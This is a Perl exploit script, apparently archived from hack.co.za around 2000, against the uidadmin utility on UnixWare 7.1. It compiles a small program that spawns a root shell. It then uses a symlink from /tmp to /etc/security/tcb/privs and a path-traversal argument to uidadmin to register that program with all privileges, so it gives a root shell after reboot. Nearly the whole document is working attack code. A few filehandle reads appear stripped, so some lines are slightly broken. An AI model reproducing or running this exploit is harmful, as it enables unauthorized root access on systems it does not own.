#!/usr/bin/perl ########################################################### # /usr/bin/uidadmin exploit for UnixWare 7.1 # Uses a symlink exploit to add our program to a list of elevated privileges # programs in /etc/security/tcb/privs. After reboot, /tmp/ui will be added # to the list of privileged programs. # # Format of the privs file is as follows (ctime and size are just as # st_ctime and st_size as described by stat(2)): # size:checksum:time:perms:/full/path/to/prog # # -Brock Tellier btellier@usa.net # ########################################################### $ui_source = "/home/xnec/ui.c"; $ui_dest = "/home/xnec/ui"; $ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}"; $privloc = "/etc/security/tcb/privs"; $uidatafile="/tmp/uidata"; $sumpath = "/usr/bin/sum"; $uidata_sym = "/tmp/uidata.tmp"; $compiler = "cc"; $uidadmin = "/usr/bin/uidadmin"; ### # Path to the directory where your $uidata_sym will exist relative to # /etc/uidata/ ### $uidadminarg = "../../tmp"; print("\n* uidadmin exploit for UnixWare 7.1 \n\n"); ### # Output $ui_code to $ui_source and compile into $ui_dest ### open(UIS, ">$ui_source"); printf(UIS "$ui_code\n"); close(UIS); system ("$compiler -o $ui_dest $ui_source"); if ( -e $ui_dest ) { print("\n$ui_dest successfully compiled\n"); } else { die "error compiling $ui_dest"; } ### # stat $ui_dest for size in bytes and ctime (seconds since epoch) ### $size=(stat($ui_dest))[7] || die "cannot stat $ui_dest"; $ctime=(stat($ui_dest))[10]; print("$ui_dest size=$size ctime=$ctime\n"); ### # get the checksum value for $ui_dest ### open(SUM, "$sumpath -r $ui_dest|"); $checksum=; chomp($checksum); @sumfields=split(' ', $checksum); $chksum = @sumfields[0]; $chksum =~ s/^0//; print("$ui_dest checksum is $chksum\n"); ### # Put our entry into $uidatafile, use trailing newline ### $uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest"; print("placing '$uidata' into $uidatafile\n"); open(TMP, ">$uidatafile"); print(TMP "$uidata\n"); close(TMP); ### # Create symlink from $uidata_sym to $privloc ### symlink($privloc, $uidata_sym); ### # All the preparation is done, launch the exploit ### system("$uidadmin -S $uidadminarg -a -r bah"); ### # Find out if the exploit worked, assume it did if $ui_dest is in $privloc ### open (PRIV, "$privloc"); @privs = ; foreach $priv (@privs) { if ($priv =~ /$ui_dest/) { print("Exploit successful. Run $ui_dest after reboot for rootshell\n"); exit(0); } } print("Exploit not successful, sorry!\n"); # www.hack.co.za [2000]#